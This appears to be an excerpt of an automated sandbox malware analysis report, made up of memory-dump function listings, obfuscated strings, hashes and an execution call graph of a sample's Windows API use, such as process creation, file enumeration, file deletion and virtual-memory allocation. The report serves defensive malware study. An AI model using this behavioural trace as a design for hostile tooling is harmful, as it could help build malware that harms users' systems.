                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24204a26689ede587203a801f0e0aa658f28e328e1f884f4b5458883865017f1
                                                                • Instruction ID: 64f67932c46535999afad5ed9415c7f7495f290a57c04650bfa1ead2b692376f
                                                                • Opcode Fuzzy Hash: 24204a26689ede587203a801f0e0aa658f28e328e1f884f4b5458883865017f1
                                                                • Instruction Fuzzy Hash: 47B012F51343415C8892B3C0C2C1C113D028E4D1257104FB066116F14AB3AC41DC2A96

                                                                Non-executed Functions

                                                                Function 03C05FBD Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                • API String ID: 0-3248090998
                                                                • Opcode ID: f109504eb7fe7e88d7bef276a28fe50900439b2dc789d111f4b3c09ff02015ab
                                                                • Instruction ID: 93bda415f3b16d4c67fd990a690f1249ef85995ac6c56a8b02448f48522fde74
                                                                • Opcode Fuzzy Hash: f109504eb7fe7e88d7bef276a28fe50900439b2dc789d111f4b3c09ff02015ab
                                                                • Instruction Fuzzy Hash: 35910EF08042A98ACB118F55A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E95DF90
                                                                Function 03BFC73D Relevance: 22.6, Strings: 18, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $0$5R$6\$=9$D$J\$U5$Y&$ZU$_[$oq$w}${"$||$3$5$~
                                                                • API String ID: 0-438648855
                                                                • Opcode ID: f4f3c355bf1ecc5c8f1d6cf63e6352b61e90c86aaf0b0d8e47d659620b49b4a6
                                                                • Instruction ID: a6128ad2b3961b6509e68ee87cbfa7416a0ebf45208b9ecde30971320292a69d
                                                                • Opcode Fuzzy Hash: f4f3c355bf1ecc5c8f1d6cf63e6352b61e90c86aaf0b0d8e47d659620b49b4a6
                                                                • Instruction Fuzzy Hash: 177136B0C0566DCBEB24CF81C9987DEBBB1BB05309F1081D9C1597B281D7BA1A89CF95
                                                                Function 03C0D08D Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                • API String ID: 0-392141074
                                                                • Opcode ID: c6fa3f486a6035e4b703431666d268efd7c6b0e97352d1fda24d2f90ff93585e
                                                                • Instruction ID: 366a66b4ae528b4088e27de1665ece5fe8afd29364cce18e7051d043ffbd3006
                                                                • Opcode Fuzzy Hash: c6fa3f486a6035e4b703431666d268efd7c6b0e97352d1fda24d2f90ff93585e
                                                                • Instruction Fuzzy Hash: 44711CB6810318AADB15EFA4CC45FEEB7B8BF08700F048199E519EA140E7715758EFA1
                                                                Function 03C00D45 Relevance: 13.8, Strings: 11, Instructions: 89COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                • API String ID: 0-685823316
                                                                • Opcode ID: 0c859f648e394344282c07f566fc7a0cba51972bfe6b65adda37046c97aa06c0
                                                                • Instruction ID: b2cb61b3de72d4c9863edd8620a7a43395442b52bb11ed84ad402716ffe6b45f
                                                                • Opcode Fuzzy Hash: 0c859f648e394344282c07f566fc7a0cba51972bfe6b65adda37046c97aa06c0
                                                                • Instruction Fuzzy Hash: C631B4B5D40318AEEF40DFE4CC45FEEBBB9AF08704F00415DE618BA180DBB556488BA4
                                                                Function 03BF5FA5 Relevance: 11.3, Strings: 9, Instructions: 60COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $29j$42:>$42:>$54?%$5>&"$==0~$Q$q#'k$xq=8
                                                                • API String ID: 0-1720297634
                                                                • Opcode ID: fa1c553fc24ef0aa9595641ab2843cb7c387c6ad0b74b8fd8b8815f6ee2c12a7
                                                                • Instruction ID: ffe696021d91f7b5561447fef37e9a2ade60e9ea99d41eac3deb7c1ddeb7ca66
                                                                • Opcode Fuzzy Hash: fa1c553fc24ef0aa9595641ab2843cb7c387c6ad0b74b8fd8b8815f6ee2c12a7
                                                                • Instruction Fuzzy Hash: 502188B1C0528C9FCF10CFE8E981AEEFF75AB05210F608299E945AB350D33656558B65
                                                                Function 03BF98ED Relevance: 11.3, Strings: 9, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ($,$D$H$S$[$f$o$}
                                                                • API String ID: 0-3110972140
                                                                • Opcode ID: 0967492584da7daf509b638183941454a553a284ab4eaf0d21c259cd8e46a154
                                                                • Instruction ID: 7494243b663e388f953ccddbceb0bd3ac51a1238ed5cb6b0b576ea34e65d8b2a
                                                                • Opcode Fuzzy Hash: 0967492584da7daf509b638183941454a553a284ab4eaf0d21c259cd8e46a154
                                                                • Instruction Fuzzy Hash: D811DE10D087CADDDB12C7BC84187AEBFB15F13224F0882D8D5F52B2D2D279460AC7A6
                                                                Function 03C081C8 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .$P$e$i$m$o$r$x
                                                                • API String ID: 0-620024284
                                                                • Opcode ID: e752167e4e8beae1464322c55aef79bd864ddd90fd03d90b3823827b66b243ea
                                                                • Instruction ID: fd40f2ca1181414bf73c75a53b13f2c71de0a2c28b48c76b7ecc5081d5e9c2b8
                                                                • Opcode Fuzzy Hash: e752167e4e8beae1464322c55aef79bd864ddd90fd03d90b3823827b66b243ea
                                                                • Instruction Fuzzy Hash: 9341C6B5810318AADB20EFA4DC44FEE777CAF55300F4085D9A50EEB140EBB55758AFA1
                                                                Function 03BF5E65 Relevance: 6.3, Strings: 5, Instructions: 25COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 48|}$j$}48z$}48zj$~tyl
                                                                • API String ID: 0-3623456416
                                                                • Opcode ID: 4e06277121ac7ee6be9403cb51b7ebf8f48e22d0a6623e36e8d1ea5e803889e6
                                                                • Instruction ID: 6ee2cf71fae3552f41d229a3536367bea4dbe6d291f3556fd672ab0f8cd3769f
                                                                • Opcode Fuzzy Hash: 4e06277121ac7ee6be9403cb51b7ebf8f48e22d0a6623e36e8d1ea5e803889e6
                                                                • Instruction Fuzzy Hash: F7F0A77190021C9ADF00DF98DA457EDBB70AB05314F6045A8DD55AF751E7348714DB62

                                                                Execution Graph

                                                                Execution Coverage:3.1%
                                                                Dynamic/Decrypted Code Coverage:4.3%
                                                                Signature Coverage:2.3%
                                                                Total number of Nodes:438
                                                                Total number of Limit Nodes:71
                                                                execution_graph 81550 c69802 81555 c7b0a0 81550->81555 81552 c6980e 81553 c69836 81552->81553 81558 c7afc0 81552->81558 81561 c79240 81555->81561 81557 c7b0bb 81557->81552 81564 c79290 81558->81564 81560 c7afd9 81560->81553 81562 c7925a 81561->81562 81563 c7926b RtlAllocateHeap 81562->81563 81563->81557 81565 c792aa 81564->81565 81566 c792bb RtlFreeHeap 81565->81566 81566->81560 81567 c59a00 81568 c59a0f 81567->81568 81569 c59a4d 81568->81569 81570 c59a3a CreateThread 81568->81570 81571 c66d80 81572 c66d9c 81571->81572 81573 c66def 81571->81573 81572->81573 81581 c78f10 81572->81581 81575 c66f21 81573->81575 81585 c66170 NtClose LdrInitializeThunk LdrInitializeThunk 81573->81585 81576 c66db7 81584 c66170 NtClose LdrInitializeThunk LdrInitializeThunk 81576->81584 81579 c66f01 81579->81575 81586 c66340 NtClose LdrInitializeThunk LdrInitializeThunk 81579->81586 81582 c78f2a 81581->81582 81583 c78f3b NtClose 81582->81583 81583->81576 81584->81573 81585->81579 81586->81575 81587 c71280 81588 c7129c 81587->81588 81589 c712c4 81588->81589 81590 c712d8 81588->81590 81591 c78f10 NtClose 81589->81591 81592 c78f10 NtClose 81590->81592 81593 c712cd 81591->81593 81594 c712e1 81592->81594 81597 c7b0e0 RtlAllocateHeap 81594->81597 81596 c712ec 81597->81596 81614 c6c1d0 81616 c6c1f9 81614->81616 81615 c6c2fc 81616->81615 81617 c6c29e FindFirstFileW 81616->81617 81617->81615 81619 c6c2b9 81617->81619 81618 c6c2e3 FindNextFileW 81618->81619 81620 c6c2f5 FindClose 81618->81620 81619->81618 81620->81615 81621 c6a950 81626 c6a660 81621->81626 81623 c6a95d 81640 c6a2d0 81623->81640 81625 c6a979 81627 c6a685 81626->81627 81651 c67f90 81627->81651 81630 c6a7d0 81630->81623 81632 c6a7e7 81632->81623 81633 c6a7de 81633->81632 81635 c6a8d5 81633->81635 81670 c69d20 81633->81670 81637 c6a93a 81635->81637 81679 c6a090 81635->81679 81638 c7afc0 RtlFreeHeap 81637->81638 81639 c6a941 81638->81639 81639->81623 81641 c6a2e6 81640->81641 81648 c6a2f1 81640->81648 81642 c7b0a0 RtlAllocateHeap 81641->81642 81642->81648 81643 c6a315 81643->81625 81644 c67f90 GetFileAttributesW 81644->81648 81645 c6a632 81646 c6a64b 81645->81646 81647 c7afc0 RtlFreeHeap 81645->81647 81646->81625 81647->81646 81648->81643 81648->81644 81648->81645 81649 c69d20 RtlFreeHeap 81648->81649 81650 c6a090 RtlFreeHeap 81648->81650 81649->81648 81650->81648 81652 c67fae 81651->81652 81653 c67fb5 GetFileAttributesW 81652->81653 81654 c67fc0 81652->81654 81653->81654 81654->81630 81655 c72ea0 81654->81655 81656 c72eae 81655->81656 81657 c72eb5 81655->81657 81656->81633 81683 c64190 81657->81683 81659 c72eea 81660 c72ef9 81659->81660 81688 c72960 LdrLoadDll 81659->81688 81662 c7b0a0 RtlAllocateHeap 81660->81662 81666 c730a7 81660->81666 81663 c72f12 81662->81663 81664 c7309d 81663->81664 81663->81666 81667 c72f2e 81663->81667 81665 c7afc0 RtlFreeHeap 81664->81665 81664->81666 81665->81666 81666->81633 81667->81666 81668 c7afc0 RtlFreeHeap 81667->81668 81669 c73091 81668->81669 81669->81633 81671 c69d46 81670->81671 81689 c6d730 81671->81689 81673 c69db8 81675 c69f40 81673->81675 81677 c69dd6 81673->81677 81674 c69f25 81674->81633 81675->81674 81676 c69be0 RtlFreeHeap 81675->81676 81676->81675 81677->81674 81694 c69be0 81677->81694 81680 c6a0b6 81679->81680 81681 c6d730 RtlFreeHeap 81680->81681 81682 c6a13d 81681->81682 81682->81635 81685 c641b4 81683->81685 81684 c641bb 81684->81659 81685->81684 81686 c64207 81685->81686 81687 c641f0 LdrLoadDll 81685->81687 81686->81659 81687->81686 81688->81660 81691 c6d754 81689->81691 81690 c6d761 81690->81673 81691->81690 81692 c7afc0 RtlFreeHeap 81691->81692 81693 c6d79e 81692->81693 81693->81673 81695 c69bfd 81694->81695 81698 c6d7b0 81695->81698 81697 c69d03 81697->81677 81699 c6d7d4 81698->81699 81700 c6d87e 81699->81700 81701 c7afc0 RtlFreeHeap 81699->81701 81700->81697 81701->81700 81702 c784d0 81703 c784ea 81702->81703 81706 4bd2df0 LdrInitializeThunk 81703->81706 81704 c78512 81706->81704 81707 c71610 81710 c71629 81707->81710 81708 c716b9 81709 c71674 81711 c7afc0 RtlFreeHeap 81709->81711 81710->81708 81710->81709 81713 c716b4 81710->81713 81712 c71684 81711->81712 81714 c7afc0 RtlFreeHeap 81713->81714 81714->81708 81715 c78350 81716 c783e5 81715->81716 81718 c78381 81715->81718 81720 4bd2ee0 LdrInitializeThunk 81716->81720 81717 c78416 81720->81717 81721 c60a5b PostThreadMessageW 81722 c60a6d 81721->81722 81725 c59a60 81726 c59d6c 81725->81726 81727 c5a244 81726->81727 81729 c7ac30 81726->81729 81730 c7ac56 81729->81730 81735 c54090 81730->81735 81732 c7ac62 81733 c7ac9b 81732->81733 81738 c75130 81732->81738 81733->81727 81737 c5409d 81735->81737 81742 c62e50 81735->81742 81737->81732 81739 c75191 81738->81739 81741 c7519e 81739->81741 81788 c61640 81739->81788 81741->81733 81743 c62e6d 81742->81743 81744 c62e86 81743->81744 81746 c62ea4 81743->81746 81763 c77cd0 NtClose LdrInitializeThunk 81743->81763 81744->81737 81751 c79980 81746->81751 81748 c62edb 81748->81744 81758 c75890 81748->81758 81750 c62f29 81750->81737 81753 c7999a 81751->81753 81752 c799c9 81752->81748 81753->81752 81764 c78520 81753->81764 81756 c7afc0 RtlFreeHeap 81757 c79a3f 81756->81757 81757->81748 81759 c758f5 81758->81759 81760 c75920 81759->81760 81771 c62ae0 81759->81771 81760->81750 81762 c75902 81762->81750 81763->81746 81765 c7853d 81764->81765 81768 4bd2c0a 81765->81768 81766 c78569 81766->81756 81769 4bd2c1f LdrInitializeThunk 81768->81769 81770 4bd2c11 81768->81770 81769->81766 81770->81766 81772 c62ab3 81771->81772 81776 c62ac8 81772->81776 81777 c679a0 81772->81777 81775 c78f10 NtClose 81775->81776 81776->81762 81778 c679ba 81777->81778 81782 c62d63 81777->81782 81783 c785c0 81778->81783 81781 c78f10 NtClose 81781->81782 81782->81775 81782->81776 81784 c785da 81783->81784 81787 4bd35c0 LdrInitializeThunk 81784->81787 81785 c67a8a 81785->81781 81787->81785 81789 c6167b 81788->81789 81804 c67ab0 81789->81804 81791 c61683 81792 c7b0a0 RtlAllocateHeap 81791->81792 81802 c61956 81791->81802 81793 c61699 81792->81793 81794 c7b0a0 RtlAllocateHeap 81793->81794 81795 c616aa 81794->81795 81796 c7b0a0 RtlAllocateHeap 81795->81796 81797 c616bb 81796->81797 81803 c6174f 81797->81803 81819 c66640 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 81797->81819 81799 c64190 LdrLoadDll 81800 c61902 81799->81800 81815 c77a70 81800->81815 81802->81741 81803->81799 81805 c67adc 81804->81805 81806 c679a0 2 API calls 81805->81806 81807 c67aff 81806->81807 81808 c67b21 81807->81808 81809 c67b09 81807->81809 81811 c67b3d 81808->81811 81813 c78f10 NtClose 81808->81813 81810 c67b14 81809->81810 81812 c78f10 NtClose 81809->81812 81810->81791 81811->81791 81812->81810 81814 c67b33 81813->81814 81814->81791 81816 c77ad2 81815->81816 81817 c77adf 81816->81817 81820 c61970 81816->81820 81817->81802 81819->81803 81822 c61990 81820->81822 81836 c67d80 81820->81836 81829 c61ed5 81822->81829 81840 c70c50 81822->81840 81825 c61ba5 81848 c7c2b0 81825->81848 81827 c619eb 81827->81829 81843 c7c180 81827->81843 81829->81817 81830 c61bba 81832 c61c07 81830->81832 81854 c60480 81830->81854 81832->81829 81833 c60480 LdrInitializeThunk 81832->81833 81857 c67d20 81832->81857 81833->81832 81834 c61d52 81834->81832 81835 c67d20 LdrInitializeThunk 81834->81835 81835->81834 81837 c67d8d 81836->81837 81838 c67db2 81837->81838 81839 c67dab SetErrorMode 81837->81839 81838->81822 81839->81838 81842 c70c71 81840->81842 81861 c7af30 81840->81861 81842->81827 81844 c7c196 81843->81844 81845 c7c190 81843->81845 81846 c7b0a0 RtlAllocateHeap 81844->81846 81845->81825 81847 c7c1bc 81846->81847 81847->81825 81849 c7c220 81848->81849 81850 c7c27d 81849->81850 81851 c7b0a0 RtlAllocateHeap 81849->81851 81850->81830 81852 c7c25a 81851->81852 81853 c7afc0 RtlFreeHeap 81852->81853 81853->81850 81868 c791b0 81854->81868 81858 c67d33 81857->81858 81873 c78420 81858->81873 81860 c67d5e 81860->81832 81864 c79080 81861->81864 81863 c7af61 81863->81842 81865 c79118 81864->81865 81867 c790ae 81864->81867 81866 c7912e NtAllocateVirtualMemory 81865->81866 81866->81863 81867->81863 81869 c791ca 81868->81869 81872 4bd2c70 LdrInitializeThunk 81869->81872 81870 c604a2 81870->81834 81872->81870 81874 c784a4 81873->81874 81876 c7844e 81873->81876 81878 4bd2dd0 LdrInitializeThunk 81874->81878 81875 c784c9 81875->81860 81876->81860 81878->81875 81879 c6fc60 81880 c6fc7d 81879->81880 81881 c64190 LdrLoadDll 81880->81881 81882 c6fc9b 81881->81882 81883 c6f3a0 81884 c6f404 81883->81884 81912 c65ee0 81884->81912 81886 c6f53e 81887 c6f537 81887->81886 81919 c65ff0 81887->81919 81889 c6f6e3 81890 c6f5ba 81890->81889 81891 c6f6f2 81890->81891 81923 c6f180 81890->81923 81892 c78f10 NtClose 81891->81892 81894 c6f6fc 81892->81894 81895 c6f5f6 81895->81891 81896 c6f601 81895->81896 81897 c7b0a0 RtlAllocateHeap 81896->81897 81898 c6f62a 81897->81898 81899 c6f633 81898->81899 81900 c6f649 81898->81900 81901 c78f10 NtClose 81899->81901 81932 c6f070 CoInitialize 81900->81932 81903 c6f63d 81901->81903 81904 c6f657 81935 c789b0 81904->81935 81906 c6f6d2 81907 c78f10 NtClose 81906->81907 81908 c6f6dc 81907->81908 81909 c7afc0 RtlFreeHeap 81908->81909 81909->81889 81910 c6f675 81910->81906 81911 c789b0 LdrInitializeThunk 81910->81911 81911->81910 81913 c65f13 81912->81913 81914 c65f37 81913->81914 81939 c78a60 81913->81939 81914->81887 81916 c65f5a 81916->81914 81917 c78f10 NtClose 81916->81917 81918 c65fd8 81917->81918 81918->81887 81920 c66015 81919->81920 81944 c78840 81920->81944 81924 c6f19c 81923->81924 81925 c64190 LdrLoadDll 81924->81925 81927 c6f1ba 81925->81927 81926 c6f1c3 81926->81895 81927->81926 81928 c64190 LdrLoadDll 81927->81928 81929 c6f28e 81928->81929 81930 c64190 LdrLoadDll 81929->81930 81931 c6f2eb 81929->81931 81930->81931 81931->81895 81934 c6f0d5 81932->81934 81933 c6f16b CoUninitialize 81933->81904 81934->81933 81936 c789cd 81935->81936 81949 4bd2ba0 LdrInitializeThunk 81936->81949 81937 c789fd 81937->81910 81940 c78a7a 81939->81940 81943 4bd2ca0 LdrInitializeThunk 81940->81943 81941 c78aa6 81941->81916 81943->81941 81945 c7885d 81944->81945 81948 4bd2c60 LdrInitializeThunk 81945->81948 81946 c66089 81946->81890 81948->81946 81949->81937 81950 c66f60 81951 c66f78 81950->81951 81953 c66fd2 81950->81953 81951->81953 81954 c6ae70 81951->81954 81955 c6ae96 81954->81955 81956 c6b0b6 81955->81956 81981 c79320 81955->81981 81956->81953 81958 c6af0f 81958->81956 81959 c7c2b0 2 API calls 81958->81959 81960 c6af2e 81959->81960 81960->81956 81961 c6affa 81960->81961 81962 c78520 LdrInitializeThunk 81960->81962 81963 c65770 LdrInitializeThunk 81961->81963 81965 c6b012 81961->81965 81964 c6af90 81962->81964 81963->81965 81964->81961 81969 c6af99 81964->81969 81967 c6b09e 81965->81967 81987 c78070 81965->81987 81966 c6afe2 81970 c67d20 LdrInitializeThunk 81966->81970 81974 c67d20 LdrInitializeThunk 81967->81974 81968 c6afc4 82002 c742b0 LdrInitializeThunk 81968->82002 81969->81956 81969->81966 81969->81968 81984 c65770 81969->81984 81975 c6aff0 81970->81975 81977 c6b0ac 81974->81977 81975->81953 81976 c6b075 81992 c78130 81976->81992 81977->81953 81979 c6b08f 81997 c782a0 81979->81997 81982 c7933a 81981->81982 81983 c7934b CreateProcessInternalW 81982->81983 81983->81958 82003 c786f0 81984->82003 81986 c657ab 81986->81968 81988 c780f6 81987->81988 81989 c780a1 81987->81989 82009 4bd39b0 LdrInitializeThunk 81988->82009 81989->81976 81990 c7811b 81990->81976 81993 c781b6 81992->81993 81994 c78161 81992->81994 82010 4bd4340 LdrInitializeThunk 81993->82010 81994->81979 81995 c781db 81995->81979 81998 c78323 81997->81998 82000 c782ce 81997->82000 82011 4bd2fb0 LdrInitializeThunk 81998->82011 81999 c78348 81999->81967 82000->81967 82002->81966 82004 c787a7 82003->82004 82006 c78725 82003->82006 82008 4bd2d10 LdrInitializeThunk 82004->82008 82005 c787ec 82005->81986 82006->81986 82008->82005 82009->81990 82010->81995 82011->81999 82012 c78e60 82013 c78ee0 82012->82013 82015 c78e91 82012->82015 82014 c78ef6 NtDeleteFile 82013->82014 82016 c7c1e0 82017 c7afc0 RtlFreeHeap 82016->82017 82018 c7c1f5 82017->82018 82019 c75ba0 82020 c75bfa 82019->82020 82022 c75c07 82020->82022 82023 c735c0 82020->82023 82024 c7af30 NtAllocateVirtualMemory 82023->82024 82025 c73601 82024->82025 82026 c64190 LdrLoadDll 82025->82026 82028 c7370e 82025->82028 82029 c73647 82026->82029 82027 c73690 Sleep 82027->82029 82028->82022 82029->82027 82029->82028 82030 c78d60 82031 c78e0a 82030->82031 82033 c78d8e 82030->82033 82032 c78e20 NtReadFile 82031->82032 82034 4bd2ad0 LdrInitializeThunk 82035 c68434 82036 c68444 82035->82036 82037 c683f1 82036->82037 82039 c66bb0 LdrInitializeThunk LdrInitializeThunk 82036->82039 82039->82037 82040 c5b1b0 82041 c7af30 NtAllocateVirtualMemory 82040->82041 82042 c5c821 82040->82042 82041->82042 82043 c61ef0 82044 c61f26 82043->82044 82045 c78520 LdrInitializeThunk 82043->82045 82048 c78fb0 82044->82048 82045->82044 82047 c61f3b 82049 c79042 82048->82049 82051 c78fde 82048->82051 82053 4bd2e80 LdrInitializeThunk 82049->82053 82050 c79073 82050->82047 82051->82047 82053->82050 82054 c657f0 82055 c67d20 LdrInitializeThunk 82054->82055 82056 c65820 82054->82056 82055->82056 82058 c6584c 82056->82058 82059 c67ca0 82056->82059 82060 c67ce4 82059->82060 82065 c67d05 82060->82065 82066 c781f0 82060->82066 82062 c67cf5 82063 c67d11 82062->82063 82064 c78f10 NtClose 82062->82064 82063->82056 82064->82065 82065->82056 82067 c78273 82066->82067 82068 c7821e 82066->82068 82071 4bd4650 LdrInitializeThunk 82067->82071 82068->82062 82069 c78298 82069->82062 82071->82069 82072 c669b0 82073 c669d7 82072->82073 82076 c67b50 82073->82076 82075 c669fe 82077 c67b6d 82076->82077 82083 c78610 82077->82083 82079 c67bbd 82080 c67bc4 82079->82080 82081 c786f0 LdrInitializeThunk 82079->82081 82080->82075 82082 c67bed 82081->82082 82082->82075 82084 c786ae 82083->82084 82085 c7863e 82083->82085 82088 4bd2f30 LdrInitializeThunk 82084->82088 82085->82079 82086 c786e7 82086->82079 82088->82086 82089 c78bf0 82090 c78cad 82089->82090 82092 c78c25 82089->82092 82091 c78cc3 NtCreateFile 82090->82091 82093 c623ba 82094 c65ee0 2 API calls 82093->82094 82095 c623f0 82094->82095

                                                                Executed Functions

                                                                Function 00C59A60 Relevance: 24.1, Strings: 19, Instructions: 394COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 167 c59a60-c59d6a 168 c59d6c-c59d75 167->168 169 c59d7b-c59d87 167->169 168->169 170 c59d94-c59d9e 169->170 171 c59d89-c59d92 169->171 172 c59daf-c59db8 170->172 171->168 173 c59dce-c59de7 172->173 174 c59dba-c59dcc 172->174 173->173 176 c59de9 173->176 174->172 177 c59df0-c59df9 176->177 178 c59e18-c59e1c 177->178 179 c59dfb-c59e16 177->179 180 c59e54-c59e5e 178->180 181 c59e1e-c59e52 178->181 179->177 182 c59e6f-c59e7b 180->182 181->178 183 c59e91-c59e9b 182->183 184 c59e7d-c59e8f 182->184 186 c59eac-c59eb8 183->186 184->182 187 c59ed6-c59ee0 186->187 188 c59eba-c59ec6 186->188 191 c59ef1-c59efb 187->191 189 c59ed4 188->189 190 c59ec8-c59ece 188->190 189->186 190->189 193 c59efd-c59f27 191->193 194 c59f29-c59f33 191->194 193->191 196 c59f44-c59f50 194->196 197 c59f63-c59f6d 196->197 198 c59f52-c59f61 196->198 200 c59f7e-c59f8a 197->200 198->196 201 c59f8c-c59f98 200->201 202 c59fa8-c59fb2 200->202 205 c59fa6 201->205 206 c59f9a-c59fa0 201->206 203 c59fb4-c59fd3 202->203 204 c59ffe-c5a005 202->204 208 c59fe5-c59ff6 203->208 209 c59fd5-c59fe3 203->209 210 c5a00c-c5a013 204->210 205->200 206->205 211 c59ffc 208->211 209->211 212 c5a015-c5a048 210->212 213 c5a04a-c5a053 210->213 211->202 212->210 214 c5a127-c5a131 213->214 215 c5a059-c5a069 213->215 216 c5a142-c5a14b 214->216 215->215 217 c5a06b-c5a083 215->217 218 c5a14d-c5a15a 216->218 219 c5a15c-c5a166 216->219 220 c5a085-c5a08f 217->220 221 c5a0e4-c5a0ee 217->221 218->216 223 c5a177-c5a181 219->223 224 c5a0a0-c5a0a9 220->224 222 c5a0ff-c5a10b 221->222 226 c5a10d-c5a116 222->226 227 c5a118-c5a122 222->227 228 c5a183-c5a1cd 223->228 229 c5a1cf-c5a1d6 223->229 230 c5a0c0-c5a0c6 224->230 231 c5a0ab-c5a0be 224->231 226->222 227->213 228->223 232 c5a208-c5a20f 229->232 233 c5a1d8-c5a206 229->233 234 c5a0e2 230->234 235 c5a0c8-c5a0e0 230->235 231->224 239 c5a236-c5a23d 232->239 240 c5a211-c5a234 232->240 233->229 234->214 235->230 241 c5a261-c5a26b 239->241 242 c5a23f call c7ac30 239->242 240->232 244 c5a244-c5a25f 242->244 244->241 244->244
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_6_2_c50000_control.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $+$4>$5$9Typ$?-$J$K$R$U5$Wk$aj$gh$k$yp$z+${${j$[
                                                                • API String ID: 0-4151789489
                                                                • Opcode ID: c39491baa88b6e378a410c31888f29e95399699648379d5c59d404b809700552
                                                                • Instruction ID: 06be750568079695ed6b7f96a93fd5fb2f40d55b351669d14800409c47c977a8
                                                                • Opcode Fuzzy Hash: c39491baa88b6e378a410c31888f29e95399699648379d5c59d404b809700552
                                                                • Instruction Fuzzy Hash: 91229BB4D05228CBEB24CF86C994BDDBBB1BB44309F1082DAD509BB290C7B55AC8DF55
                                                                Function 00C6C1D0 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 00C6C2AF
                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 00C6C2EE
                                                                • FindClose.KERNELBASE(?), ref: 00C6C2F9
                                                                Memory Dump Source
                                                                • Source File: 00000006.00000002.4132211926.0000000000C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
